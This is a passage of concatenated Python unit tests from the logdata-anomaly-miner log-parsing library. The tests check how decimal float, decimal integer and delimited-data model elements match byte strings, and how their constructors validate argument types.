decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test6get_match_element_mandatory_blank_values_no_match(self): """Test not matching values with default values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_MANDATORY, DecimalFloatValueModelElement.PAD_TYPE_BLANK, DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL) data = b"22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+ 22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"- 22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+22,25" value = b"+22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22,25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22.12.2021 some string." match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" +25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" -25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"00" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test7element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, DecimalFloatValueModelElement, "") # empty element_id self.assertRaises(TypeError, DecimalFloatValueModelElement, None) # None element_id self.assertRaises(TypeError, DecimalFloatValueModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, True) # bool element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, set()) # empty set element_id is not allowed def test8value_sign_type_input_validation(self): """Check if value_sign_type is validated.""" DecimalFloatValueModelElement(self.id_, value_sign_type="none") DecimalFloatValueModelElement(self.id_, value_sign_type="optional") DecimalFloatValueModelElement(self.id_, value_sign_type="mandatory") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, value_sign_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=[]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=set()) def test9value_pad_type_input_validation(self): """Check if value_pad_type is validated.""" DecimalFloatValueModelElement(self.id_, value_pad_type="none") DecimalFloatValueModelElement(self.id_, value_pad_type="zero") DecimalFloatValueModelElement(self.id_, value_pad_type="blank") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, value_pad_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=[]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=set()) def test10exponent_type_input_validation(self): """Check if exponent_type is validated.""" DecimalFloatValueModelElement(self.id_, exponent_type="none") DecimalFloatValueModelElement(self.id_, exponent_type="optional") DecimalFloatValueModelElement(self.id_, exponent_type="mandatory") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, exponent_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=[]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=set()) def test11get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DecimalFloatValueModelElement(self.id_) data = b"123.22" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/DecimalIntegerValueModelElementTest.py000066400000000000000000000631661437606560100330210ustar00rootroot00000000000000import unittest from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class DecimalIntegerValueModelElementTest(TestBase): """Unittests for the DecimalIntegerValueModelElement.""" id_ = "integer" path = "path" def test1get_match_element_default_values(self): """Test valid integer values with default values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) data = b"22.25 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"0.25 some string." value = b"0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"22 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22.12.2021 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22. some string" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"0 some string" value = b"0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test2get_match_element_default_values_no_match(self): """Test not matching values with default values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"-22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22,25" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1e-5" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1e+0" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"00" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"no number 22 some string." match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_optional_zero_values(self): """Test valid float values with "optional" or "zero" values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL, DecimalIntegerValueModelElement.PAD_TYPE_ZERO) data = b"22.25 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"-22.25 some string." value = b"-22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -22, None) data = b"0.25 some string." value = b"0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"22 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22.12.2021 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22. some string" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"025 some string" value = b"025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"0025 some string" value = b"0025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"0025.22 some string" value = b"0025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"1e-5 some string" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"1e+0 some string" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"0 some string" value = b"0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"00 some string" value = b"00" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test4get_match_element_optional_zero_values_no_match(self): """Test not matching values with default values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL, DecimalIntegerValueModelElement.PAD_TYPE_ZERO) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22,25" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"no number 22 some string." match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5get_match_element_mandatory_blank_values(self): """Test valid float values with "mandatory" or "blank" values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_MANDATORY, DecimalIntegerValueModelElement.PAD_TYPE_BLANK) data = b"+22.25 some string." value = b"+22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"-22.25 some string." value = b"-22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -22, None) data = b"+0.25 some string." value = b"+0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"+22 some string." value = b"+22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"+22. some string" value = b"+22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"+ 25 some string" value = b"+ 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"- 25 some string" value = b"- 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -25, None) data = b"+1e-5 some string" value = b"+1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+1e+0 some string" value = b"+1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+ 1e+0 some string" value = b"+ 1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+0 some string" value = b"+0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test6get_match_element_mandatory_blank_values_no_match(self): """Test not matching values with default values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_MANDATORY, DecimalIntegerValueModelElement.PAD_TYPE_BLANK) data = b"22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+ 22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"- 22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+22,25" value = b"+22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22,25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22.12.2021 some string." match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" +25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" -25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"00" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"no number 22 some string." match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test7element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, DecimalIntegerValueModelElement, "") # empty element_id self.assertRaises(TypeError, DecimalIntegerValueModelElement, None) # None element_id self.assertRaises(TypeError, DecimalIntegerValueModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, set()) # empty set element_id is not allowed def test9value_sign_type_input_validation(self): """Check if value_sign_type is validated.""" DecimalIntegerValueModelElement(self.id_, value_sign_type="none") DecimalIntegerValueModelElement(self.id_, value_sign_type="optional") DecimalIntegerValueModelElement(self.id_, value_sign_type="mandatory") self.assertRaises(ValueError, DecimalIntegerValueModelElement, self.id_, value_sign_type="None") self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=None) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=b"none") self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=True) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=123) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=123.22) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=["none"]) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=[]) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=()) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=set()) def test10value_pad_type_input_validation(self): """Check if value_pad_type is validated.""" DecimalIntegerValueModelElement(self.id_, value_pad_type="none") DecimalIntegerValueModelElement(self.id_, value_pad_type="zero") DecimalIntegerValueModelElement(self.id_, value_pad_type="blank") self.assertRaises(ValueError, DecimalIntegerValueModelElement, self.id_, value_pad_type="None") self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=None) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=b"none") self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=True) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=123) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=123.22) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=["none"]) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=[]) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=()) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=set()) def test11get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DecimalIntegerValueModelElement(self.id_) data = b"123.22" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/DelimitedDataModelElementTest.py000066400000000000000000000463611437606560100316400ustar00rootroot00000000000000import unittest from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class DelimitedDataModelElementTest(TestBase): """Unittests for the DelimitedDataModelElement.""" id_ = "delimited" path = "path" delimiter = b"," def test1get_match_element_single_char(self): """A single character is used as delimiter and not consumed (consume_delimiter=False).""" data = b"this is a match context.\n" delimited_data_model_element = DelimitedDataModelElement(self.id_, b"a") value = b"this is " match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"c") value = b"this is a mat" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"e") value = b"this is a match cont" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"\n") value = b"this is a match context." match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_single_char_no_match(self): """A single character is used as delimiter and not matched.""" data = b"this is a match context.\n" for char in "bdfgjklpqruvwyz": delimited_data_model_element = DelimitedDataModelElement(self.id_, char.encode()) match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3delimiter_string(self): """In this test case a whole string is searched for in the match_data and it is not consumed (consume_delimiter=False).""" data = b"this is a match context.\n" value = b"this" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b" is") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"th" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"is") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is a match " match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"t" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"his is a match context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test4delimiter_string_no_match(self): """In this test case a whole string is searched for in the match_data with no match.""" data = b"this is a match context.\n" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"other data") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"isa") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"this is a match context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5special_characters_escape(self): """In this test case special character escaping is tested. The delimiter is not consumed (consume_delimiter=False).""" data = b'error: the command \\"python run.py\\" was not found" ' value = b'error: the command \\"python run.py\\" was not found' match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b'"', b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = rb"^This is a simple regex string. It costs 10\$.$" value = rb"^This is a simple regex string. It costs 10\$." match_context = DummyMatchContext(data) 